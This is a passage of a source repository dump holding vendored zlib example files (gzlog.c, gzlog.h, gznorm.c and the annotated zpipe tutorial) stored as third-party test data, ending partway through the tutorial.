append compressed data */ if (len) { /* set up for deflate, allocating memory */ strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; if (deflateInit2(&strm, Z_DEFAULT_COMPRESSION, Z_DEFLATED, -15, 8, Z_DEFAULT_STRATEGY) != Z_OK) return -2; /* read in dictionary (last 32K of data that was compressed) */ strcpy(log->end, ".dict"); fd = open(log->path, O_RDONLY, 0); if (fd >= 0) { dict = read(fd, buf, DICT); close(fd); if (dict < 0) { deflateEnd(&strm); return -1; } if (dict) deflateSetDictionary(&strm, buf, (uint)dict); } log_touch(log); /* prime deflate with last bits of previous block, position write pointer to write those bits and overwrite what follows */ if (lseek(log->fd, log->first - (log->back > 8 ? 2 : 1), SEEK_SET) < 0 || read(log->fd, buf, 1) != 1 || lseek(log->fd, -1, SEEK_CUR) < 0) { deflateEnd(&strm); return -1; } deflatePrime(&strm, (8 - log->back) & 7, *buf); /* compress, finishing with a partial non-last empty static block */ strm.next_in = data; max = (((uint)0 - 1) >> 1) + 1; /* in case int smaller than size_t */ do { strm.avail_in = len > max ? max : (uint)len; len -= strm.avail_in; do { strm.avail_out = DICT; strm.next_out = buf; deflate(&strm, len ? Z_NO_FLUSH : Z_PARTIAL_FLUSH); got = DICT - strm.avail_out; if (got && write(log->fd, buf, got) != got) { deflateEnd(&strm); return -1; } log_touch(log); } while (strm.avail_out == 0); } while (len); deflateEnd(&strm); BAIL(5); /* find start of empty static block -- scanning backwards the first one bit is the second bit of the block, if the last byte is zero, then we know the byte before that has a one in the top bit, since an empty static block is ten bits long */ if ((log->first = lseek(log->fd, -1, SEEK_CUR)) < 0 || read(log->fd, buf, 1) != 1) return -1; log->first++; if (*buf) { log->back = 1; while ((*buf & ((uint)1 << (8 - log->back++))) == 0) ; /* guaranteed to terminate, since *buf != 0 */ } else log->back = 10; /* update compressed crc and length */ log->ccrc = log->tcrc; log->clen = log->tlen; } else { /* no data to compress -- fix up existing gzip stream */ log->tcrc = log->ccrc; log->tlen = log->clen; } /* complete and truncate gzip stream */ log->last = log->first; log->stored = 0; PUT4(buf, log->tcrc); PUT4(buf + 4, log->tlen); if (log_last(log, 1) || write(log->fd, buf, 8) != 8 || (end = lseek(log->fd, 0, SEEK_CUR)) < 0 || ftruncate(log->fd, end)) return -1; BAIL(6); /* mark as being in the replace operation */ if (log_mark(log, REPLACE_OP)) return -1; /* execute the replace operation and mark the file as done */ return log_replace(log); } /* log a repair record to the .repairs file */ local void log_log(struct log *log, int op, char *record) { time_t now; FILE *rec; now = time(NULL); strcpy(log->end, ".repairs"); rec = fopen(log->path, "a"); if (rec == NULL) return; fprintf(rec, "%.24s %s recovery: %s\n", ctime(&now), op == APPEND_OP ? "append" : (op == COMPRESS_OP ? "compress" : "replace"), record); fclose(rec); return; } /* Recover the interrupted operation op. First read foo.add for recovering an append or compress operation. Return -1 if there was an error reading or writing foo.gz or reading an existing foo.add, or -2 if there was a memory allocation failure. */ local int log_recover(struct log *log, int op) { int fd, ret = 0; unsigned char *data = NULL; size_t len = 0; struct stat st; /* log recovery */ log_log(log, op, "start"); /* load foo.add file if expected and present */ if (op == APPEND_OP || op == COMPRESS_OP) { strcpy(log->end, ".add"); if (stat(log->path, &st) == 0 && st.st_size) { len = (size_t)(st.st_size); if ((off_t)len != st.st_size || (data = malloc(st.st_size)) == NULL) { log_log(log, op, "allocation failure"); return -2; } if ((fd = open(log->path, O_RDONLY, 0)) < 0) { free(data); log_log(log, op, ".add file read failure"); return -1; } ret = (size_t)read(fd, data, len) != len; close(fd); if (ret) { free(data); log_log(log, op, ".add file read failure"); return -1; } log_log(log, op, "loaded .add file"); } else log_log(log, op, "missing .add file!"); } /* recover the interrupted operation */ switch (op) { case APPEND_OP: ret = log_append(log, data, len); break; case COMPRESS_OP: ret = log_compress(log, data, len); break; case REPLACE_OP: ret = log_replace(log); } /* log status */ log_log(log, op, ret ? "failure" : "complete"); /* clean up */ if (data != NULL) free(data); return ret; } /* Close the foo.gz file (if open) and release the lock. */ local void log_close(struct log *log) { if (log->fd >= 0) close(log->fd); log->fd = -1; log_unlock(log); } /* Open foo.gz, verify the header, and load the extra field contents, after first creating the foo.lock file to gain exclusive access to the foo.* files. If foo.gz does not exist or is empty, then write the initial header, extra, and body content of an empty foo.gz log file. If there is an error creating the lock file due to access restrictions, or an error reading or writing the foo.gz file, or if the foo.gz file is not a proper log file for this object (e.g. not a gzip file or does not contain the expected extra field), then return true. If there is an error, the lock is released. Otherwise, the lock is left in place. */ local int log_open(struct log *log) { int op; /* release open file resource if left over -- can occur if lock lost between gzlog_open() and gzlog_write() */ if (log->fd >= 0) close(log->fd); log->fd = -1; /* negotiate exclusive access */ if (log_lock(log) < 0) return -1; /* open the log file, foo.gz */ strcpy(log->end, ".gz"); log->fd = open(log->path, O_RDWR | O_CREAT, 0644); if (log->fd < 0) { log_close(log); return -1; } /* if new, initialize foo.gz with an empty log, delete old dictionary */ if (lseek(log->fd, 0, SEEK_END) == 0) { if (write(log->fd, log_gzhead, HEAD) != HEAD || write(log->fd, log_gzext, EXTRA) != EXTRA || write(log->fd, log_gzbody, BODY) != BODY) { log_close(log); return -1; } strcpy(log->end, ".dict"); unlink(log->path); } /* verify log file and load extra field information */ if ((op = log_head(log)) < 0) { log_close(log); return -1; } /* check for interrupted process and if so, recover */ if (op != NO_OP && log_recover(log, op)) { log_close(log); return -1; } /* touch the lock file to prevent another process from grabbing it */ log_touch(log); return 0; } /* See gzlog.h for the description of the external methods below */ gzlog *gzlog_open(char *path) { size_t n; struct log *log; /* check arguments */ if (path == NULL || *path == 0) return NULL; /* allocate and initialize log structure */ log = malloc(sizeof(struct log)); if (log == NULL) return NULL; strcpy(log->id, LOGID); log->fd = -1; /* save path and end of path for name construction */ n = strlen(path); log->path = malloc(n + 9); /* allow for ".repairs" */ if (log->path == NULL) { free(log); return NULL; } strcpy(log->path, path); log->end = log->path + n; /* gain exclusive access and verify log file -- may perform a recovery operation if needed */ if (log_open(log)) { free(log->path); free(log); return NULL; } /* return pointer to log structure */ return log; } /* gzlog_compress() return values: 0: all good -1: file i/o error (usually access issue) -2: memory allocation failure -3: invalid log pointer argument */ int gzlog_compress(gzlog *logd) { int fd, ret; uint block; size_t len, next; unsigned char *data, buf[5]; struct log *log = logd; /* check arguments */ if (log == NULL || strcmp(log->id, LOGID)) return -3; /* see if we lost the lock -- if so get it again and reload the extra field information (it probably changed), recover last operation if necessary */ if (log_check(log) && log_open(log)) return -1; /* create space for uncompressed data */ len = ((size_t)(log->last - log->first) & ~(((size_t)1 << 10) - 1)) + log->stored; if ((data = malloc(len)) == NULL) return -2; /* do statement here is just a cheap trick for error handling */ do { /* read in the uncompressed data */ if (lseek(log->fd, log->first - 1, SEEK_SET) < 0) break; next = 0; while (next < len) { if (read(log->fd, buf, 5) != 5) break; block = PULL2(buf + 1); if (next + block > len || read(log->fd, (char *)data + next, block) != block) break; next += block; } if (lseek(log->fd, 0, SEEK_CUR) != log->last + 4 + log->stored) break; log_touch(log); /* write the uncompressed data to the .add file */ strcpy(log->end, ".add"); fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) break; ret = (size_t)write(fd, data, len) != len; if (ret | close(fd)) break; log_touch(log); /* write the dictionary for the next compress to the .temp file */ strcpy(log->end, ".temp"); fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) break; next = DICT > len ? len : DICT; ret = (size_t)write(fd, (char *)data + len - next, next) != next; if (ret | close(fd)) break; log_touch(log); /* roll back to compressed data, mark the compress in progress */ log->last = log->first; log->stored = 0; if (log_mark(log, COMPRESS_OP)) break; BAIL(7); /* compress and append the data (clears mark) */ ret = log_compress(log, data, len); free(data); return ret; } while (0); /* broke out of do above on i/o error */ free(data); return -1; } /* gzlog_write() return values: 0: all good -1: file i/o error (usually access issue) -2: memory allocation failure -3: invalid log pointer argument */ int gzlog_write(gzlog *logd, void *data, size_t len) { int fd, ret; struct log *log = logd; /* check arguments */ if (log == NULL || strcmp(log->id, LOGID)) return -3; if (data == NULL || len <= 0) return 0; /* see if we lost the lock -- if so get it again and reload the extra field information (it probably changed), recover last operation if necessary */ if (log_check(log) && log_open(log)) return -1; /* create and write .add file */ strcpy(log->end, ".add"); fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) return -1; ret = (size_t)write(fd, data, len) != len; if (ret | close(fd)) return -1; log_touch(log); /* mark log file with append in progress */ if (log_mark(log, APPEND_OP)) return -1; BAIL(8); /* append data (clears mark) */ if (log_append(log, data, len)) return -1; /* check to see if it's time to compress -- if not, then done */ if (((log->last - log->first) >> 10) + (log->stored >> 10) < TRIGGER) return 0; /* time to compress */ return gzlog_compress(log); } /* gzlog_close() return values: 0: ok -3: invalid log pointer argument */ int gzlog_close(gzlog *logd) { struct log *log = logd; /* check arguments */ if (log == NULL || strcmp(log->id, LOGID)) return -3; /* close the log file and release the lock */ log_close(log); /* free structure and return */ if (log->path != NULL) free(log->path); strcpy(log->id, "bad"); free(log); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzlog.h ================================================ /* gzlog.h Copyright (C) 2004, 2008, 2012 Mark Adler, all rights reserved version 2.2, 14 Aug 2012 This software is provided 'as-is', without any express or implied warranty. In no event will the author be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Mark Adler madler@alumni.caltech.edu */ /* Version History: 1.0 26 Nov 2004 First version 2.0 25 Apr 2008 Complete redesign for recovery of interrupted operations Interface changed slightly in that now path is a prefix Compression now occurs as needed during gzlog_write() gzlog_write() now always leaves the log file as valid gzip 2.1 8 Jul 2012 Fix argument checks in gzlog_compress() and gzlog_write() 2.2 14 Aug 2012 Clean up signed comparisons */ /* The gzlog object allows writing short messages to a gzipped log file, opening the log file locked for small bursts, and then closing it. The log object works by appending stored (uncompressed) data to the gzip file until 1 MB has been accumulated. At that time, the stored data is compressed, and replaces the uncompressed data in the file. The log file is truncated to its new size at that time. After each write operation, the log file is a valid gzip file that can decompressed to recover what was written. The gzlog operations can be interrupted at any point due to an application or system crash, and the log file will be recovered the next time the log is opened with gzlog_open(). */ #ifndef GZLOG_H #define GZLOG_H /* gzlog object type */ typedef void gzlog; /* Open a gzlog object, creating the log file if it does not exist. Return NULL on error. Note that gzlog_open() could take a while to complete if it has to wait to verify that a lock is stale (possibly for five minutes), or if there is significant contention with other instantiations of this object when locking the resource. path is the prefix of the file names created by this object. If path is "foo", then the log file will be "foo.gz", and other auxiliary files will be created and destroyed during the process: "foo.dict" for a compression dictionary, "foo.temp" for a temporary (next) dictionary, "foo.add" for data being added or compressed, "foo.lock" for the lock file, and "foo.repairs" to log recovery operations performed due to interrupted gzlog operations. A gzlog_open() followed by a gzlog_close() will recover a previously interrupted operation, if any. */ gzlog *gzlog_open(char *path); /* Write to a gzlog object. Return zero on success, -1 if there is a file i/o error on any of the gzlog files (this should not happen if gzlog_open() succeeded, unless the device has run out of space or leftover auxiliary files have permissions or ownership that prevent their use), -2 if there is a memory allocation failure, or -3 if the log argument is invalid (e.g. if it was not created by gzlog_open()). This function will write data to the file uncompressed, until 1 MB has been accumulated, at which time that data will be compressed. The log file will be a valid gzip file upon successful return. */ int gzlog_write(gzlog *log, void *data, size_t len); /* Force compression of any uncompressed data in the log. This should be used sparingly, if at all. The main application would be when a log file will not be appended to again. If this is used to compress frequently while appending, it will both significantly increase the execution time and reduce the compression ratio. The return codes are the same as for gzlog_write(). */ int gzlog_compress(gzlog *log); /* Close a gzlog object. Return zero on success, -3 if the log argument is invalid. The log object is freed, and so cannot be referenced again. */ int gzlog_close(gzlog *log); #endif ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gznorm.c ================================================ /* gznorm.c -- normalize a gzip stream * Copyright (C) 2018 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h * Version 1.0 7 Oct 2018 Mark Adler */ // gznorm takes a gzip stream, potentially containing multiple members, and // converts it to a gzip stream with a single member. In addition the gzip // header is normalized, removing the file name and time stamp, and setting the // other header contents (XFL, OS) to fixed values. gznorm does not recompress // the data, so it is fast, but no advantage is gained from the history that // could be available across member boundaries. #include // fread, fwrite, putc, fflush, ferror, fprintf, // vsnprintf, stdout, stderr, NULL, FILE #include // malloc, free #include // strerror #include // errno #include // va_list, va_start, va_end #include "zlib.h" // inflateInit2, inflate, inflateReset, inflateEnd, // z_stream, z_off_t, crc32_combine, Z_NULL, Z_BLOCK, // Z_OK, Z_STREAM_END, Z_BUF_ERROR, Z_DATA_ERROR, // Z_MEM_ERROR #if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__) # include # include # define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY) #else # define SET_BINARY_MODE(file) #endif #define local static // printf to an allocated string. Return the string, or NULL if the printf or // allocation fails. local char *aprintf(char *fmt, ...) { // Get the length of the result of the printf. va_list args; va_start(args, fmt); int len = vsnprintf(NULL, 0, fmt, args); va_end(args); if (len < 0) return NULL; // Allocate the required space and printf to it. char *str = malloc(len + 1); if (str == NULL) return NULL; va_start(args, fmt); vsnprintf(str, len + 1, fmt, args); va_end(args); return str; } // Return with an error, putting an allocated error message in *err. Doing an // inflateEnd() on an already ended state, or one with state set to Z_NULL, is // permitted. #define BYE(...) \ do { \ inflateEnd(&strm); \ *err = aprintf(__VA_ARGS__); \ return 1; \ } while (0) // Chunk size for buffered reads and for decompression. Twice this many bytes // will be allocated on the stack by gzip_normalize(). Must fit in an unsigned. #define CHUNK 16384 // Read a gzip stream from in and write an equivalent normalized gzip stream to // out. If given no input, an empty gzip stream will be written. If successful, // 0 is returned, and *err is set to NULL. On error, 1 is returned, where the // details of the error are returned in *err, a pointer to an allocated string. // // The input may be a stream with multiple gzip members, which is converted to // a single gzip member on the output. Each gzip member is decompressed at the // level of deflate blocks. This enables clearing the last-block bit, shifting // the compressed data to concatenate to the previous member's compressed data, // which can end at an arbitrary bit boundary, and identifying stored blocks in // order to resynchronize those to byte boundaries. The deflate compressed data // is terminated with a 10-bit empty fixed block. If any members on the input // end with a 10-bit empty fixed block, then that block is excised from the // stream. This avoids appending empty fixed blocks for every normalization, // and assures that gzip_normalize applied a second time will not change the // input. The pad bits after stored block headers and after the final deflate // block are all forced to zeros. local int gzip_normalize(FILE *in, FILE *out, char **err) { // initialize the inflate engine to process a gzip member z_stream strm; strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; strm.avail_in = 0; strm.next_in = Z_NULL; if (inflateInit2(&strm, 15 + 16) != Z_OK) BYE("out of memory"); // State while processing the input gzip stream. enum { // BETWEEN -> HEAD -> BLOCK -> TAIL -> BETWEEN -> ... BETWEEN, // between gzip members (must end in this state) HEAD, // reading a gzip header BLOCK, // reading deflate blocks TAIL // reading a gzip trailer } state = BETWEEN; // current component being processed unsigned long crc = 0; // accumulated CRC of uncompressed data unsigned long len = 0; // accumulated length of uncompressed data unsigned long buf = 0; // deflate stream bit buffer of num bits int num = 0; // number of bits in buf (at bottom) // Write a canonical gzip header (no mod time, file name, comment, extra // block, or extra flags, and OS is marked as unknown). fwrite("\x1f\x8b\x08\0\0\0\0\0\0\xff", 1, 10, out); // Process the gzip stream from in until reaching the end of the input, // encountering invalid input, or experiencing an i/o error. int more; // true if not at the end of the input do { // State inside this loop. unsigned char *put; // next input buffer location to process int prev; // number of bits from previous block in // the bit buffer, or -1 if not at the // start of a block unsigned long long memb; // uncompressed length of member size_t tail; // number of trailer bytes read (0..8) unsigned long part; // accumulated trailer component // Get the next chunk of input from in. unsigned char dat[CHUNK]; strm.avail_in = fread(dat, 1, CHUNK, in); if (strm.avail_in == 0) break; more = strm.avail_in == CHUNK; strm.next_in = put = dat; // Run that chunk of input through the inflate engine to exhaustion. do { // At this point it is assured that strm.avail_in > 0. // Inflate until the end of a gzip component (header, deflate // block, trailer) is reached, or until all of the chunk is // consumed. The resulting decompressed data is discarded, though // the total size of the decompressed data in each member is // tracked, for the calculation of the total CRC. do { // inflate and handle any errors unsigned char scrap[CHUNK]; strm.avail_out = CHUNK; strm.next_out = scrap; int ret = inflate(&strm, Z_BLOCK); if (ret == Z_MEM_ERROR) BYE("out of memory"); if (ret == Z_DATA_ERROR) BYE("input invalid: %s", strm.msg); if (ret != Z_OK && ret != Z_BUF_ERROR && ret != Z_STREAM_END) BYE("internal error"); // Update the number of uncompressed bytes generated in this // member. The actual count (not modulo 2^32) is required to // correctly compute the total CRC. unsigned got = CHUNK - strm.avail_out; memb += got; if (memb < got) BYE("overflow error"); // Continue to process this chunk until it is consumed, or // until the end of a component (header, deflate block, or // trailer) is reached. } while (strm.avail_out == 0 && (strm.data_type & 0x80) == 0); // Since strm.avail_in was > 0 for the inflate call, some input was // just consumed. It is therefore assured that put < strm.next_in. // Disposition the consumed component or part of a component. switch (state) { case BETWEEN: state = HEAD; // Fall through to HEAD when some or all of the header is // processed. case HEAD: // Discard the header. if (strm.data_type & 0x80) { // End of header reached -- deflate blocks follow. put = strm.next_in; prev = num; memb = 0; state = BLOCK; } break; case BLOCK: // Copy the deflate stream to the output, but with the // last-block-bit cleared. Re-synchronize stored block // headers to the output byte boundaries. The bytes at // put..strm.next_in-1 is the compressed data that has been // processed and is ready to be copied to the output. // At this point, it is assured that new compressed data is // available, i.e., put < strm.next_in. If prev is -1, then // that compressed data starts in the middle of a deflate // block. If prev is not -1, then the bits in the bit // buffer, possibly combined with the bits in *put, contain // the three-bit header of the new deflate block. In that // case, prev is the number of bits from the previous block // that remain in the bit buffer. Since num is the number // of bits in the bit buffer, we have that num - prev is // the number of bits from the new block currently in the // bit buffer. // If strm.data_type & 0xc0 is 0x80, then the last byte of // the available compressed data includes the last bits of // the end of a deflate block. In that case, that last byte // also has strm.data_type & 0x1f bits of the next deflate // block, in the range 0..7. If strm.data_type & 0xc0 is // 0xc0, then the last byte of the compressed data is the // end of the deflate stream, followed by strm.data_type & // 0x1f pad bits, also in the range 0..7. // Set bits to the number of bits not yet consumed from the // last byte. If we are at the end of the block, bits is // either the number of bits in the last byte belonging to // the next block, or the number of pad bits after the // final block. In either of those cases, bits is in the // range 0..7. ; // (required due to C syntax oddity) int bits = strm.data_type & 0x1f; if (prev != -1) { // We are at the start of a new block. Clear the last // block bit, and check for special cases. If it is a // stored block, then emit the header and pad to the // next byte boundary. If it is a final, empty fixed // block, then excise it. // Some or all of the three header bits for this block // may already be in the bit buffer. Load any remaining // header bits into the bit buffer. if (num - prev < 3) { buf += (unsigned long)*put++ << num; num += 8; } // Set last to have a 1 in the position of the last // block bit in the bit buffer. unsigned long last = (unsigned long)1 << prev; if (((buf >> prev) & 7) == 3) { // This is a final fixed block. Load at least ten // bits from this block, including the header, into // the bit buffer. We already have at least three, // so at most one more byte needs to be loaded. if (num - prev < 10) { if (put == strm.next_in) // Need to go get and process more input. // We'll end up back here to finish this. break; buf += (unsigned long)*put++ << num; num += 8; } if (((buf >> prev) & 0x3ff) == 3) { // That final fixed block is empty. Delete it // to avoid adding an empty block every time a // gzip stream is normalized. num = prev; buf &= last - 1; // zero the pad bits } } else if (((buf >> prev) & 6) == 0) { // This is a stored block. Flush to the next // byte boundary after the three-bit header. num = (prev + 10) & ~7; buf &= last - 1; // zero the pad bits } // Clear the last block bit. buf &= ~last; // Write out complete bytes in the bit buffer. while (num >= 8) { putc(buf, out); buf >>= 8; num -= 8; } // If no more bytes left to process, then we have // consumed the byte that had bits from the next block. if (put == strm.next_in) bits = 0; } // We are done handling the deflate block header. Now copy // all or almost all of the remaining compressed data that // has been processed so far. Don't copy one byte at the // end if it contains bits from the next deflate block or // pad bits at the end of a deflate block. // mix is 1 if we are at the end of a deflate block, and if // some of the bits in the last byte follow this block. mix // is 0 if we are in the middle of a deflate block, if the // deflate block ended on a byte boundary, or if all of the // compressed data processed so far has been consumed. int mix = (strm.data_type & 0x80) && bits; // Copy all of the processed compressed data to the output, // except for the last byte if it contains bits from the // next deflate block or pad bits at the end of the deflate // stream. Copy the data after shifting in num bits from // buf in front of it, leaving num bits from the end of the // compressed data in buf when done. unsigned char *end = strm.next_in - mix; if (put < end) { if (num) // Insert num bits from buf before the data being // copied. do { buf += (unsigned)(*put++) << num; putc(buf, out); buf >>= 8; } while (put < end); else { // No shifting needed -- write directly. fwrite(put, 1, end - put, out); put = end; } } // Process the last processed byte if it wasn't written. if (mix) { // Load the last byte into the bit buffer. buf += (unsigned)(*put++) << num; num += 8; if (strm.data_type & 0x40) { // We are at the end of the deflate stream and // there are bits pad bits. Discard the pad bits // and write a byte to the output, if available. // Leave the num bits left over in buf to prepend // to the next deflate stream. num -= bits; if (num >= 8) { putc(buf, out); num -= 8; buf >>= 8; } // Force the pad bits in the bit buffer to zeros. buf &= ((unsigned long)1 << num) - 1; // Don't need to set prev here since going to TAIL. } else // At the end of an internal deflate block. Leave // the last byte in the bit buffer to examine on // the next entry to BLOCK, when more bits from the // next block will be available. prev = num - bits; // number of bits in buffer // from current block } // Don't have a byte left over, so we are in the middle of // a deflate block, or the deflate block ended on a byte // boundary. Set prev appropriately for the next entry into // BLOCK. else if (strm.data_type & 0x80) // The block ended on a byte boundary, so no header // bits are in the bit buffer. prev = num; else // In the middle of a deflate block, so no header here. prev = -1; // Check for the end of the deflate stream. if ((strm.data_type & 0xc0) == 0xc0) { // That ends the deflate stream on the input side, the // pad bits were discarded, and any remaining bits from // the last block in the stream are saved in the bit // buffer to prepend to the next stream. Process the // gzip trailer next. tail = 0; part = 0; state = TAIL; } break; case TAIL: // Accumulate available trailer bytes to update the total // CRC and the total uncompressed length. do { part = (part >> 8) + ((unsigned long)(*put++) << 24); tail++; if (tail == 4) { // Update the total CRC. z_off_t len2 = memb; if (len2 < 0 || (unsigned long long)len2 != memb) BYE("overflow error"); crc = crc ? crc32_combine(crc, part, len2) : part; part = 0; } else if (tail == 8) { // Update the total uncompressed length. (It's ok // if this sum is done modulo 2^32.) len += part; // At the end of a member. Set up to inflate an // immediately following gzip member. (If we made // it this far, then the trailer was valid.) if (inflateReset(&strm) != Z_OK) BYE("internal error"); state = BETWEEN; break; } } while (put < strm.next_in); break; } // Process the input buffer until completely consumed. } while (strm.avail_in > 0); // Process input until end of file, invalid input, or i/o error. } while (more); // Done with the inflate engine. inflateEnd(&strm); // Verify the validity of the input. if (state != BETWEEN) BYE("input invalid: incomplete gzip stream"); // Write the remaining deflate stream bits, followed by a terminating // deflate fixed block. buf += (unsigned long)3 << num; putc(buf, out); putc(buf >> 8, out); if (num > 6) putc(0, out); // Write the gzip trailer, which is the CRC and the uncompressed length // modulo 2^32, both in little-endian order. putc(crc, out); putc(crc >> 8, out); putc(crc >> 16, out); putc(crc >> 24, out); putc(len, out); putc(len >> 8, out); putc(len >> 16, out); putc(len >> 24, out); fflush(out); // Check for any i/o errors. if (ferror(in) || ferror(out)) BYE("i/o error: %s", strerror(errno)); // All good! *err = NULL; return 0; } // Normalize the gzip stream on stdin, writing the result to stdout. int main(void) { // Avoid end-of-line conversions on evil operating systems. SET_BINARY_MODE(stdin); SET_BINARY_MODE(stdout); // Normalize from stdin to stdout, returning 1 on error, 0 if ok. char *err; int ret = gzip_normalize(stdin, stdout, &err); if (ret) fprintf(stderr, "gznorm error: %s\n", err); free(err); return ret; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zlib_how.html ================================================ zlib Usage Example

zlib Usage Example

We often get questions about how the deflate() and inflate() functions should be used. Users wonder when they should provide more input, when they should use more output, what to do with a Z_BUF_ERROR, how to make sure the process terminates properly, and so on. So for those who have read zlib.h (a few times), and would like further edification, below is an annotated example in C of simple routines to compress and decompress from an input file to an output file using deflate() and inflate() respectively. The annotations are interspersed between lines of the code. So please read between the lines. We hope this helps explain some of the intricacies of zlib.

Without further ado, here is the program zpipe.c: 


/* zpipe.c: example of proper use of zlib's inflate() and deflate()
   Not copyrighted -- provided to the public domain
   Version 1.4  11 December 2005  Mark Adler */

/* Version history:
   1.0  30 Oct 2004  First version
   1.1   8 Nov 2004  Add void casting for unused return values
                     Use switch statement for inflate() return values
   1.2   9 Nov 2004  Add assertions to document zlib guarantees
   1.3   6 Apr 2005  Remove incorrect assertion in inf()
   1.4  11 Dec 2005  Add hack to avoid MSDOS end-of-line conversions
                     Avoid some compiler warnings for input and output buffers
 */
We now include the header files for the required definitions. From stdio.h we use fopen(), fread(), fwrite(), feof(), ferror(), and fclose() for file i/o, and fputs() for error messages. From string.h we use strcmp() for command line argument processing. From assert.h we use the assert() macro. From zlib.h we use the basic compression functions deflateInit(), deflate(), and deflateEnd(), and the basic decompression functions inflateInit(), inflate(), and inflateEnd(). 

#include <stdio.h>
#include <string.h>
#include <assert.h>
#include "zlib.h"
This is an ugly hack required to avoid corruption of the input and output data on Windows/MS-DOS systems. Without this, those systems would assume that the input and output files are text, and try to convert the end-of-line characters from one standard to another. That would corrupt binary data, and in particular would render the compressed data unusable. This sets the input and output to binary which suppresses the end-of-line conversions. SET_BINARY_MODE() will be used later on stdin and stdout, at the beginning of main(). 

#if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__)
#  include <fcntl.h>
#  include <io.h>
#  define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY)
#else
#  define SET_BINARY_MODE(file)
#endif
CHUNK is simply the buffer size for feeding data to and pulling data from the zlib routines. Larger buffer sizes would be more efficient, especially for inflate(). If the memory is available, buffers sizes on the order of 128K or 256K bytes should be used. 

#define CHUNK 16384
The def() routine compresses data from an input file to an output file. The output data will be in the zlib format, which is different from the gzip or zip formats. The zlib format has a very small header of only two bytes to identify it as a zlib stream and to provide decoding information, and a four-byte trailer with a fast check value to verify the integrity of the uncompressed data after decoding. 

/* Compress from file source to file dest until EOF on source.
   def() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_STREAM_ERROR if an invalid compression
   level is supplied, Z_VERSION_ERROR if the version of zlib.h and the
   version of the library linked do not match, or Z_ERRNO if there is
   an error reading or writing the files. */
int def(FILE *source, FILE *dest, int level)
{
Here are the local variables for def(). ret will be used for zlib return codes. flush will keep track of the current flushing state for deflate(), which is either no flushing, or flush to completion after the end of the input file is reached. have is the amount of data returned from deflate(). The strm structure is used to pass information to and from the zlib routines, and to maintain the deflate() state. in and out are the input and output buffers for deflate(). 

    int ret, flush;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];
The first thing we do is to initialize the zlib state for compression using deflateInit(). This must be done before the first use of deflate(). The zalloc, zfree, and opaque fields in the strm structure must be initialized before calling deflateInit(). Here they are set to the zlib constant Z_NULL to request that zlib use the default memory allocation routines. An application may also choose to provide custom memory allocation routines here. deflateInit() will allocate on the order of 256K bytes for the internal state. (See zlib Technical Details.)

deflateInit() is called with a pointer to the structure to be initialized and the compression level, which is an integer in the range of -1 to 9. Lower compression levels result in faster execution, but less compression. Higher levels result in greater compression, but slower execution. The zlib constant Z_DEFAULT_COMPRESSION, equal to -1, provides a good compromise between compression and speed and is equivalent to level 6. Level 0 actually does no compression at all, and in fact expands the data slightly to produce the zlib format (it is not a byte-for-byte copy of the input). More advanced applications of zlib may use deflateInit2() here instead. Such an application may want to reduce how much memory will be used, at some price in compression. Or it may need to request a gzip header and trailer instead of a zlib header and trailer, or raw encoding with no header or trailer at all.

We must check the return value of deflateInit() against the zlib constant Z_OK to make sure that it was able to allocate memory for the internal state, and that the provided arguments were valid. deflateInit() will also check that the version of zlib that the zlib.h file came from matches the version of zlib actually linked with the program. This is especially important for environments in which zlib is a shared library.

Note that an application can initialize multiple, independent zlib streams, which can operate in parallel. The state information maintained in the structure allows the zlib routines to be reentrant. 


    /* allocate deflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    ret = deflateInit(&strm, level);
    if (ret != Z_OK)
        return ret;
With the pleasantries out of the way, now we can get down to business. The outer do-loop reads all of the input file and exits at the bottom of the loop once end-of-file is reached. This loop contains the only call of deflate(). So we must make sure that all of the input data has been processed and that all of the output data has been generated and consumed before we fall out of the loop at the bottom. 

    /* compress until end of file */
    do {
We start off by reading data from the input file. The number of bytes read is put directly into avail_in, and a pointer to those bytes is put into next_in. We also check to see if end-of-file on the input has been reached using feof(). If we are at the end of file, then flush is set to the zlib constant Z_FINISH, which is later passed to deflate() to indicate that this is the last chunk of input data to compress. If we are not yet at the end of the input, then the zlib constant Z_NO_FLUSH will be passed to deflate to indicate that we are still in the middle of the uncompressed data.

If there is an error in reading from the input file, the process is aborted with deflateEnd() being called to free the allocated zlib state before returning the error. We wouldn't want a memory leak, now would we? deflateEnd() can be called at any time after the state has been initialized. Once that's done, deflateInit() (or deflateInit2()) would have to be called to start a new compression process. There is no point here in checking the deflateEnd() return code. The deallocation can't fail. 


        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            (void)deflateEnd(&strm);
            return Z_ERRNO;
        }
        flush = feof(source) ? Z_FINISH : Z_NO_FLUSH;
        strm.next_in = in;
The inner do-loop passes our chunk of input data to deflate(), and then keeps calling deflate() until it is done producing output. Once there is no more new output, deflate() is guaranteed to have consumed all of the input, i.e., avail_in will be zero. 

        /* run deflate() on input until output buffer not full, finish
           compression if all of source has been read in */
        do {
Output space is provided to deflate() by setting avail_out to the number of available output bytes and next_out to a pointer to that space. 

